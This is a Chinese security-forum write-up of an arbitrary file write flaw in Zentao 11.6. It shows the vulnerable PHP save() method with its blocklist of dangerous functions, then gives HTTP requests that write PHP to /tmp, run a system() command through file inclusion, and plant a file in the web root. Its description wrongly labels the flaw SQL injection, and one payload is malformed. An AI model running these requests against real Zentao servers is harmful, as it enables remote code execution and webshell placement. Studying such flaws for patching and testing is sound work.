奇安信攻防社区-Zentao 11.6 api-getModel-editor-save-filePath 任意文件写入漏洞

Zentao 11.6 api-getModel-editor-save-filePath 任意文件写入漏洞

# Zentao 11.6 api-getModel-editor-save-filePath 任意文件写入漏洞 ## 漏洞描述 Zentao 11.6 版本中对用户接口调用权限过滤不完善，导致调用接口执行SQL语句导致SQL注入 ## 影响版本...

Zentao 11.6 api-getModel-editor-save-filePath 任意文件写入漏洞
======================================================

漏洞描述
----

Zentao 11.6 版本中对用户接口调用权限过滤不完善，导致调用接口执行SQL语句导致SQL注入

影响版本
----

Zentao 11.6

环境搭建
----

这里使用docker环境搭建

```plain
docker run --name zentao_v11.6 -p 8084:80 -v /u01/zentao/www:/app/zentaopms -v /u01/zentao/data:/var/lib/mysql -e MYSQL_ROOT_PASSWORD=123456 -d docker.io/yunwisdom/zentao:v11.6
```

![img](https://shs3.b.qianxin.com/butian_public/f3297959c03048955d3896b9da21e63c614f27d8fe977.jpg)

漏洞复现
----

这里造成漏洞的原因同样是调用接口权限无限制的原因

接口出现漏洞的原因具体参考可以查看上一篇 `Zentao 11.6版本 SQL注入漏洞` 关于此漏洞的完整分析

查看`module/api/ediyor/moudel.php`下的`save方法`

```php
public function save($filePath)
    {
        $fileContent = $this->post->fileContent;
        $evils       = array('eval', 'exec', 'passthru', 'proc_open', 'shell_exec', 'system', '$$', 'include', 'require', 'assert');
        $gibbedEvils = array('e v a l', 'e x e c', ' p a s s t h r u', ' p r o c _ o p e n', 's h e l l _ e x e c', 's y s t e m', '$ $', 'i n c l u d e', 'r e q u i r e', 'a s s e r t');
        $fileContent = str_ireplace($gibbedEvils, $evils, $fileContent);
        if(get_magic_quotes_gpc()) $fileContent = stripslashes($fileContent);

$dirPath = dirname($filePath);
        $extFilePath = substr($filePath, 0, strpos($filePath, DS . 'ext' . DS) + 4);
        if(!is_dir($dirPath) and is_writable($extFilePath)) mkdir($dirPath, 0777, true);
        if(is_writable($dirPath))
        {
            file_put_contents($filePath, $fileContent);
        }
        else
        {
            die(js::alert($this->lang->editor->notWritable . $extFilePath));
        }
    }
```

`$filePath参数和$fileContent参数` 我们是可控的

调用方法往 `/tmp`写入一个`phpinfo()`

```plain
POST /api-getModel-editor-save-filePath=/tmp/shell.php

fileContent=<?php phpinfo();?>
```

![img](https://shs3.b.qianxin.com/butian_public/f9632826ee545080f4f4a5279f813abf80fc93dbb3d48.jpg)

![img](https://shs3.b.qianxin.com/butian_public/f539437f56f3be5695265997ce3f5db774b40b7d6866e.jpg)

在利用 Zentao 11.6版本 任意文件读取漏洞 第二种方法来文件包含

```plain
/api-getModel-api-getMethod-filePath=/tmp/shell/1
```

![img](https://shs3.b.qianxin.com/butian_public/f6087083c6aeabb8530b4cf245277031e562e6112f57c.jpg)

也可以写入网站目录中

先获取地址

```plain
POST /api-getModel-editor-save-filePath=/tmp/shell

fileContent=<?php system('find / -name ioncube.php')?>');?>
```

访问 `/api-getModel-api-getMethod-filePath=/tmp/shell/1`

![img](https://shs3.b.qianxin.com/butian_public/f8565646624ac183f5efdf4a81aba2e4fe5eceed41e7e.jpg)

得到目录为 `/app/zentaopma/www`

请求改为

```plain
POST /api-getModel-editor-save-filePath=/tmp/shell

fileContent=<?php file_put_contents('/app/zentaopms/www/xxx.php', '<?php phpinfo();?>');?>
```

再去访问 /api-getModel-api-getMethod-filePath=/tmp/shell/1，则会再网站目录下生成 xxx.php 文件

![img](https://shs3.b.qianxin.com/butian_public/f5540874cb7d37cff389b136c5a9a3e5d0ac9e81e0fa0.jpg)

![img](https://shs3.b.qianxin.com/butian_public/f46407878e818d86b3a6085cda0ecaee361dcc48443e5.jpg)

发表于 2024-07-12 18:43:58
阅读 ( 979 )
分类：CMS

Zentao 11.6 api-getModel-editor-save-filePath 任意文件写入漏洞

0 条评论